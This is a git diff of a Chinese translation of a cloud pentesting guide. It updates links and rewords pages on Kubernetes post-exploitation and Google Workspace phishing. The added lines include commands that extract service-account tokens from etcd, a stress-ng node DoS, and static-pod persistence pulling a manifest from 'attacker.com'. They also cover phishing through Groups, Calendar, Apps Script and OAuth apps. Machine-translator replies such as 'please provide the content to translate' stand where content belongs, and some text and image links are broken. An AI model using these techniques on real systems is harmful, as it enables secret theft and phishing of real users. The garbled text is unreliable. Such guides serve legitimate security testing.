diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
index 5fd35d667..95d297c42 100644
--- a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
@@ -15,11 +15,11 @@
如果一个网站**易受 SSRF 攻击**并且可以**添加元数据头**,攻击者可能会利用它从元数据端点访问 SA OAuth 令牌。有关 SSRF 的更多信息,请查看:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/index.html
{{#endref}}
### 易受攻击的暴露服务
-如果 GCP 实例具有易受攻击的暴露服务,攻击者可能会利用它来破坏该服务。
+如果 GCP 实例有一个易受攻击的暴露服务,攻击者可能会利用它来攻陷该服务。
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
index 44c2d38d6..4cea52d64 100644
--- a/src/pentesting-cloud/ibm-cloud-pentesting/README.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -4,11 +4,11 @@
{{#include ../../banners/hacktricks-training.md}}
-### 什么是IBM云? (By chatGPT)
+### 什么是IBM云?(由chatGPT提供)
IBM Cloud是IBM提供的云计算平台,提供多种云服务,如基础设施即服务(IaaS)、平台即服务(PaaS)和软件即服务(SaaS)。它使客户能够在云中部署和管理应用程序,处理数据存储和分析,并操作虚拟机。
-与亚马逊网络服务(AWS)相比,IBM Cloud展示了一些独特的特点和方法:
+与亚马逊网络服务(AWS)相比,IBM Cloud展示了一些独特的特性和方法:
1. **重点**:IBM Cloud主要面向企业客户,提供一套为其特定需求设计的服务,包括增强的安全性和合规性措施。相比之下,AWS为多样化的客户群体提供广泛的云服务。
2. **混合云解决方案**:IBM Cloud和AWS都提供混合云服务,允许将本地基础设施与其云服务集成。然而,每个提供的方法和服务有所不同。
@@ -25,10 +25,10 @@ ibm-basic-information.md
### SSRF
-了解如何访问IBM的元数据端点,请查看以下页面:
+了解如何访问IBM的medata端点,请参见以下页面:
{{#ref}}
-https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0
+https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#ibm-cloud
{{#endref}}
## 参考文献
diff --git a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
index c347592bc..820dcf6fc 100644
--- a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -8,29 +8,29 @@
-### 从 pod 逃逸
+### 从 Pod 逃逸
-为了尝试从 pods 逃逸,你可能需要先 **提升权限**,一些实现的方法:
+为了尝试从 Pod 中逃逸,你可能需要先 **提升权限**,一些实现的方法如下:
{{#ref}}
-https://book.hacktricks.xyz/linux-hardening/privilege-escalation
+https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
{{#endref}}
-你可以查看这些 **docker 逃逸尝试从你已攻陷的 pod 中逃逸**:
+你可以查看这些 **docker 逃逸尝试**,以从你已攻陷的 Pod 中逃逸:
{{#ref}}
-https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout
+https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html
{{#endref}}
### 滥用 Kubernetes 权限
-正如在 **kubernetes 枚举** 部分中所解释的:
+如在 **Kubernetes 枚举** 部分所述:
{{#ref}}
kubernetes-enumeration.md
{{#endref}}
-通常,pods 是使用 **服务账户令牌** 运行的。这个服务账户可能附带一些 **权限**,你可以 **滥用** 这些权限 **移动** 到其他 pods,甚至 **逃逸** 到集群内配置的节点。查看如何操作:
+通常,Pods 是使用 **服务账户令牌** 运行的。这个服务账户可能附带一些 **权限**,你可以 **滥用** 这些权限 **移动** 到其他 Pods,甚至 **逃逸** 到集群内配置的节点。查看如何操作:
{{#ref}}
abusing-roles-clusterroles-in-kubernetes/
@@ -38,11 +38,11 @@ abusing-roles-clusterroles-in-kubernetes/
### 滥用云权限
-如果 pod 在 **云环境** 中运行,你可能能够从 **元数据端点泄露一个令牌** 并使用它提升权限。
+如果 Pod 在 **云环境** 中运行,你可能能够从 **元数据端点泄露一个令牌** 并使用它提升权限。
## 搜索易受攻击的网络服务
-由于你在 Kubernetes 环境中,如果你无法通过滥用当前 pods 权限来提升权限,并且无法从容器中逃逸,你应该 **搜索潜在的易受攻击服务。**
+由于你在 Kubernetes 环境中,如果你无法通过滥用当前 Pods 权限来提升权限,并且无法从容器中逃逸,你应该 **搜索潜在的易受攻击服务。**
### 服务
@@ -50,7 +50,7 @@ abusing-roles-clusterroles-in-kubernetes/
```
kubectl get svc --all-namespaces
```
-默认情况下,Kubernetes 使用扁平网络架构,这意味着**集群内的任何 pod/service 都可以与其他 pod/service 通信**。集群内的**命名空间**默认**没有任何网络安全限制**。命名空间中的任何人都可以与其他命名空间通信。
+默认情况下,Kubernetes 使用扁平网络架构,这意味着 **集群内的任何 pod/service 都可以与其他 pod/service 通信**。集群内的 **namespaces** **默认没有任何网络安全限制**。在该命名空间中的任何人都可以与其他命名空间通信。
### 扫描
@@ -85,8 +85,8 @@ pentesting-kubernetes-services/
## 网络欺骗
-默认情况下,像**ARP欺骗**(以及因此产生的**DNS欺骗**)的技术在Kubernetes网络中有效。因此,在pod内部,如果您具有**NET_RAW能力**(默认情况下存在),您将能够发送自定义构造的网络数据包,并通过ARP欺骗对同一节点上运行的所有pod执行**中间人攻击**。\
-此外,如果**恶意pod**与DNS服务器在**同一节点**上运行,您将能够对集群中的所有pod执行**DNS欺骗攻击**。
+默认情况下,像**ARP欺骗**(以及因此产生的**DNS欺骗**)的技术在Kubernetes网络中有效。因此,在pod内部,如果您具有**NET_RAW能力**(默认情况下存在),您将能够发送自定义构造的网络数据包并执行**通过ARP欺骗对同一节点上运行的所有pod进行中间人攻击**。\
+此外,如果**恶意pod**与DNS服务器在**同一节点上运行**,您将能够对集群中的所有pod执行**DNS欺骗攻击**。
{{#ref}}
kubernetes-network-attacks.md
@@ -94,9 +94,9 @@ kubernetes-network-attacks.md
## 节点DoS
-Kubernetes清单中没有资源规范,并且对容器**未应用限制**范围。作为攻击者,我们可以**消耗pod/部署运行的所有资源**,使其他资源匮乏,从而导致环境的DoS。
+Kubernetes清单中没有资源规范,并且**未应用限制**范围给容器。作为攻击者,我们可以**消耗pod/部署运行的所有资源**,使其他资源匮乏,从而导致环境的DoS。
-这可以使用工具如[**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
+这可以通过工具如[**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng)来完成:
```
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```
@@ -104,15 +104,15 @@ stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```bash
kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
```
-## 节点后渗透
+## Node Post-Exploitation
如果你成功地**逃离了容器**,你会在节点中发现一些有趣的东西:
- **容器运行时**进程(Docker)
-- 节点中运行的更多**pods/containers**,你可以像这样利用它们(更多令牌)
+- 节点中运行的更多**pods/containers**,你可以像这样利用(更多令牌)
- 整个**文件系统**和**操作系统**一般
-- 正在监听的**Kube-Proxy**服务
-- 正在监听的**Kubelet**服务。检查配置文件:
+- **Kube-Proxy**服务在监听
+- **Kubelet**服务在监听。检查配置文件:
- 目录:`/var/lib/kubelet/`
- `/var/lib/kubelet/kubeconfig`
- `/var/lib/kubelet/kubelet.conf`
@@ -126,7 +126,7 @@ kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxx
- `/etc/kubernetes/manifests/etcd.yaml` - **etcd配置**
- `/etc/kubernetes/pki` - **Kubernetes密钥**
-### 查找节点kubeconfig
+### Find node kubeconfig
如果你在之前提到的路径中找不到kubeconfig文件,**检查kubelet进程的`--kubeconfig`参数**:
```
@@ -154,20 +154,20 @@ echo ""
fi
done
```
-脚本 [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) 将自动 **获取其他 pod 的令牌并检查它们是否具有您所寻找的权限**(而不是您逐个查找):
+脚本 [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) 将自动 **获取其他 pod 的令牌并检查它们是否具有您正在寻找的权限**(而不是您逐个查找):
```bash
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code
```
### 特权 DaemonSets
-DaemonSet 是一个 **pod**,将在 **集群的所有节点** 中 **运行**。因此,如果 DaemonSet 配置了 **特权服务账户,** 在 **所有节点** 中你都可以找到该 **特权服务账户** 的 **token**,你可以利用它。
+DaemonSet 是一个 **pod**,将在 **集群的所有节点** 中 **运行**。因此,如果一个 DaemonSet 配置了 **特权服务账户**,在 **所有节点** 中你都能找到该 **特权服务账户** 的 **token**,你可以利用它。
利用的方式与前一节相同,但你现在不再依赖运气。
### 转向云
-如果集群由云服务管理,通常 **节点对元数据** 端点的访问与 Pod 不同。因此,尝试从 **节点访问元数据端点**(或从 hostNetwork 设置为 True 的 pod):
+如果集群由云服务管理,通常 **节点对元数据** 端点的访问权限与 Pod 不同。因此,尝试从 **节点访问元数据端点**(或从 hostNetwork 设置为 True 的 pod):
{{#ref}}
kubernetes-pivoting-to-clouds.md
@@ -175,26 +175,26 @@ kubernetes-pivoting-to-clouds.md
### 偷取 etcd
-如果你可以指定将运行容器的 [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node),在控制平面节点中获取 shell 并获取 **etcd 数据库**:
+如果你可以指定将运行容器的 [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node),在控制平面节点中获取一个 shell 并获取 **etcd 数据库**:
```
kubectl get nodes
NAME STATUS ROLES AGE VERSION
k8s-control-plane Ready master 93d v1.19.1
k8s-worker Ready 93d v1.19.1
```
-控制平面节点具有 **master 角色**,在 **云管理的集群中,您将无法在其中运行任何东西**。
+control-plane 节点具有 **role master**,在 **云管理的集群中,您将无法在其中运行任何东西**。
#### 从 etcd 读取秘密 1
如果您可以使用 pod 规格中的 `nodeName` 选择器在控制平面节点上运行您的 pod,您可能会轻松访问 `etcd` 数据库,该数据库包含集群的所有配置,包括所有秘密。
-以下是一种快速且简单的方法,可以从 `etcd` 中获取秘密,如果它在您所在的控制平面节点上运行。如果您想要一个更优雅的解决方案,可以启动一个带有 `etcd` 客户端工具 `etcdctl` 的 pod,并使用控制平面节点的凭据连接到运行中的 etcd,请查看来自 @mauilion 的 [这个示例清单](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml)。
+以下是从 `etcd` 中抓取秘密的快速而简单的方法,如果它在您所在的控制平面节点上运行。如果您想要一个更优雅的解决方案,可以启动一个带有 `etcd` 客户端工具 `etcdctl` 的 pod,并使用控制平面节点的凭据连接到运行中的 etcd,请查看 @mauilion 的 [这个示例清单](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml)。
**检查 `etcd` 是否在控制平面节点上运行,并查看数据库的位置(这是在 `kubeadm` 创建的集群上)**
```
root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir
```
-抱歉,我无法满足该请求。
+请提供需要翻译的具体内容。
```bash
data-dir=/var/lib/etcd
```
@@ -210,11 +210,11 @@ db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciO
```bash
db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default
```
-抱歉,我无法提供该内容的翻译。
+请提供需要翻译的具体内容。
```
1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
```
-#### 从 etcd 读取秘密 2 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
+#### 从 etcd 2 读取秘密 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
1. 创建 **`etcd`** 数据库的快照。查看 [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) 获取更多信息。
2. 以你喜欢的方式将 **`etcd`** 快照传输出节点。
@@ -237,27 +237,27 @@ etcdctl get /registry/secrets/default/my-secret
```
### 静态/镜像 Pods 持久性
-静态 Pods 由特定节点上的 kubelet 守护进程直接管理,而不受 API 服务器的监视。与由控制平面管理的 Pods(例如,Deployment)不同;相反,**kubelet 监视每个静态 Pod**(并在其失败时重启它)。
+静态 Pods 由特定节点上的 kubelet 守护进程直接管理,而不被 API 服务器观察。与由控制平面管理的 Pods(例如,Deployment)不同;相反,**kubelet 监视每个静态 Pod**(并在其失败时重启它)。
因此,静态 Pods 始终**绑定到特定节点上的一个 Kubelet**。
-**kubelet 会自动尝试在 Kubernetes API 服务器上为每个静态 Pod 创建一个镜像 Pod**。这意味着在节点上运行的 Pods 在 API 服务器上是可见的,但无法从那里进行控制。Pod 名称将以节点主机名为后缀,并带有前导连字符。
+**kubelet 会自动尝试在 Kubernetes API 服务器上为每个静态 Pod 创建一个镜像 Pod**。这意味着在节点上运行的 Pods 在 API 服务器上是可见的,但无法从那里进行控制。Pod 名称将以节点主机名为后缀,前面带有一个连字符。
> [!CAUTION]
-> 静态 Pod 的 **`spec` 不能引用其他 API 对象**(例如,ServiceAccount、ConfigMap、Secret 等)。因此 **您无法利用此行为在当前节点上启动具有任意 serviceAccount 的 pod 来破坏集群**。但您可以利用此功能在不同的命名空间中运行 Pods(如果出于某种原因这很有用)。
+> 静态 Pod 的 **`spec` 不能引用其他 API 对象**(例如,ServiceAccount、ConfigMap、Secret 等)。因此 **您无法利用此行为在当前节点上启动一个具有任意 serviceAccount 的 pod 来破坏集群**。但您可以利用此功能在不同的命名空间中运行 Pods(如果出于某种原因这很有用)。
-如果您在节点主机内部,可以让它在内部创建一个**静态 pod**。这非常有用,因为它可能允许您在不同的命名空间中**创建一个 pod**,例如 **kube-system**。
+如果您在节点主机内部,可以让它在**内部创建一个静态 pod**。这非常有用,因为它可能允许您在不同的命名空间中**创建一个 pod**,例如 **kube-system**。
-为了创建一个静态 pod,[**文档非常有帮助**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/)。您基本上需要两个东西:
+要创建静态 pod,[**文档非常有帮助**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/)。您基本上需要两件事:
-- 在 **kubelet 服务**中配置参数 **`--pod-manifest-path=/etc/kubernetes/manifests`**,或在 **kubelet 配置**中([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration))并重启服务
+- 在 **kubelet 服务**中配置参数 **`--pod-manifest-path=/etc/kubernetes/manifests`**,或在 **kubelet 配置**中([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration))并重启服务
- 在 **`/etc/kubernetes/manifests`** 中创建 **pod 定义**
**另一种更隐蔽的方法是:**
-- 修改 **kubelet** 配置文件中的参数 **`staticPodURL`**,并设置类似 `staticPodURL: http://attacker.com:8765/pod.yaml` 的内容。这将使 kubelet 进程创建一个 **静态 pod**,从指定的 URL 获取 **配置**。
+- 修改 **kubelet** 配置文件中的参数 **`staticPodURL`**,并设置类似 `staticPodURL: http://attacker.com:8765/pod.yaml` 的内容。这将使 kubelet 进程创建一个 **静态 pod**,从 **指定的 URL** 获取 **配置**。
-**示例**的 **pod** 配置,以在 **kube-system** 中创建一个特权 pod,取自 [**这里**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
+**示例**的 **pod** 配置以在 **kube-system** 中创建一个特权 pod,取自 [**这里**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
```yaml
apiVersion: v1
kind: Pod
@@ -283,10 +283,10 @@ hostPath:
path: /
type: Directory
```
-### 删除 pods + 无法调度的节点
+### 删除 Pods + 无法调度的节点
-如果攻击者**攻陷了一个节点**,并且他可以**删除其他节点上的 pods**,并且**使其他节点无法执行 pods**,那么 pods 将在被攻陷的节点上重新运行,他将能够**窃取在其中运行的令牌**。\
-有关[**更多信息,请访问此链接**](abusing-roles-clusterroles-in-kubernetes/#delete-pods-+-unschedulable-nodes)。
+如果攻击者**攻陷了一个节点**,并且他可以**删除其他节点上的 Pods**,并且**使其他节点无法执行 Pods**,那么这些 Pods 将在被攻陷的节点上重新运行,他将能够**窃取在其中运行的令牌**。\
+有关[**更多信息,请访问此链接**](abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods-+-unschedulable-nodes)。
## 自动化工具
diff --git a/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
index 40600bf1c..338441163 100644
--- a/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
+++ b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -5,20 +5,20 @@
## Generic Phishing Methodology
{{#ref}}
-https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
+https://book.hacktricks.wiki/en/generic-methodologies-and-resources/phishing-methodology/index.html
{{#endref}}
## Google Groups Phishing
-显然,默认情况下,在workspace成员[**可以创建群组**](https://groups.google.com/all-groups) **并邀请人们加入**。然后,您可以修改将发送给用户的电子邮件,**添加一些链接。** 该**电子邮件将来自一个google地址**,因此看起来**合法**,人们可能会点击链接。
+显然,默认情况下,在workspace成员[**可以创建群组**](https://groups.google.com/all-groups) **并邀请人们加入**。然后,您可以修改将发送给用户的电子邮件,**添加一些链接**。该**电子邮件将来自谷歌地址**,因此看起来**合法**,人们可能会点击链接。
-还可以将**发件人**地址设置为**Google群组电子邮件**,以向**群组内的用户发送更多电子邮件**,如以下图像所示,其中创建了群组**`google--support@googlegroups.com`**并向该群组的**所有成员**发送了**电子邮件**(这些成员是在没有任何同意的情况下添加的)
+还可以将**发件人**地址设置为**Google群组电子邮件**,以向**群组内的用户发送更多电子邮件**,如以下图像所示,其中创建了群组**`google--support@googlegroups.com`**,并向该群组的**所有成员**发送了**电子邮件**(这些成员是在没有任何同意的情况下添加的)
 (1).png)
## Google Chat Phishing
-您可能能够仅通过拥有他们的电子邮件地址**开始与某人的聊天**或发送**邀请进行对话**。此外,可以**创建一个空间**,可以有任何名称(例如“Google支持”)并**邀请**成员加入。如果他们接受,他们可能会认为自己正在与Google支持进行对话:
+您可能能够仅通过拥有他们的电子邮件地址**开始与某人聊天**或发送**邀请进行对话**。此外,可以**创建一个空间**,可以有任何名称(例如“Google支持”)并**邀请**成员加入。如果他们接受,他们可能会认为自己正在与Google支持进行对话:
.png)
@@ -29,13 +29,13 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodo
## Google Doc Phishing
-过去,可以创建一个**看似合法的文档**,并在评论中**提到某个电子邮件(如@user@gmail.com)**。Google **向该电子邮件地址发送了一封电子邮件**,通知他们在文档中被提到。\
+过去,可以创建一个**看似合法的文档**,并在评论中**提到某个电子邮件(如 @user@gmail.com)**。Google **向该电子邮件地址发送了一封电子邮件**,通知他们在文档中被提到。\
如今,这不再有效,但如果您**给予受害者访问文档的权限**,Google将发送一封电子邮件指示如此。这是提到某人时出现的消息:
.png)
> [!TIP]
-> 受害者可能有保护机制,不允许指示与他们共享外部文档的电子邮件到达他们的电子邮件。
+> 受害者可能有保护机制,不允许指示与他们共享外部文档的电子邮件到达他们的邮箱。
## Google Calendar Phishing
@@ -49,16 +49,16 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodo
- 设置为**接收者无法看到其他被邀请的人**
- **不要发送通知事件的电子邮件**。然后,人们只会看到他们关于5分钟内会议的警告,以及他们需要阅读该链接。
-- 显然,使用API,您可以将**人们**的**接受**事件设置为**True**,甚至可以代表他们创建**评论**。
+- 显然,使用API可以将**人们**的**接受**事件设置为**True**,甚至可以代表他们创建**评论**。
## App Scripts Redirect Phishing
可以在[https://script.google.com/](https://script.google.com/)上创建一个脚本,并**将其公开为所有人可访问的Web应用程序**,将使用合法域名**`script.google.com`**。\
-通过一些代码,如下所示,攻击者可以使脚本在此页面加载任意内容,而不停止访问该域:
+通过一些代码,如下所示,攻击者可以使脚本在此页面上加载任意内容,而不停止访问该域:
```javascript
function doGet() {
return HtmlService.createHtmlOutput(
-''
+''
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
}
```
@@ -104,17 +104,17 @@ gws-app-scripts.md
[**这里**](https://developers.google.com/identity/protocols/oauth2/scopes) 您可以找到所有 Google OAuth 范围的列表。
-- **cloud-platform**:查看和管理您在 **Google Cloud Platform** 服务中的数据。您可以在 GCP 中冒充用户。
+- **cloud-platform**:查看和管理您在 **Google Cloud Platform** 服务中的数据。您可以在 GCP 中模拟用户。
- **admin.directory.user.readonly**:查看和下载您组织的 GSuite 目录。获取所有用户的姓名、电话、日历 URL。
### 创建 OAuth 应用
**开始创建 OAuth 客户端 ID**
-1. 转到 [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) 并点击配置同意屏幕。
+1. 访问 [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) 并点击配置同意屏幕。
2. 然后,系统会询问 **用户类型** 是 **内部**(仅限您组织中的人员)还是 **外部**。选择适合您需求的选项
- 如果您已经入侵了组织中的用户并且正在创建此应用以钓鱼另一个用户,内部可能会很有趣。
-3. 给应用一个 **名称**,一个 **支持电子邮件**(请注意,您可以设置一个 googlegroup 邮件以尝试让自己更匿名),一个 **徽标**,**授权域** 和另一个用于 **更新** 的 **电子邮件**。
+3. 给应用命名,提供 **支持电子邮件**(请注意,您可以设置一个 Google 群组电子邮件以尝试更匿名),一个 **徽标**,**授权域** 和另一个用于 **更新** 的 **电子邮件**。
4. **选择** **OAuth 范围**。
- 此页面分为非敏感权限、敏感权限和受限权限。每次添加新权限时,它会被添加到其类别中。根据请求的权限,用户将看到不同的提示,指示这些权限的敏感性。
- **`admin.directory.user.readonly`** 和 **`cloud-platform`** 都是敏感权限。
@@ -122,7 +122,7 @@ gws-app-scripts.md
现在让我们使用 **之前创建的 OAuth 客户端 ID** 获取 **Web 应用的凭据**:
-1. 返回到 [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient),这次会出现不同的选项。
+1. 返回 [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient),这次会出现不同的选项。
2. 选择 **为 Web 应用创建凭据**
3. 设置所需的 **Javascript 来源** 和 **重定向 URI**
- 您可以在两者中设置类似 **`http://localhost:8000/callback`** 的内容进行测试
@@ -135,7 +135,7 @@ cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "" --client-secret ""
```
-前往 **`http://localhost:8000`** 点击“使用 Google 登录”按钮,您将会看到类似于以下的提示信息:
+转到 **`http://localhost:8000`** 点击 Google 登录按钮,您将会看到类似于以下的提示消息:
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1) (1) (1).png)
[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte) (1).png)
[**HackTricks 培训 GCP 红队专家 (GRTE)**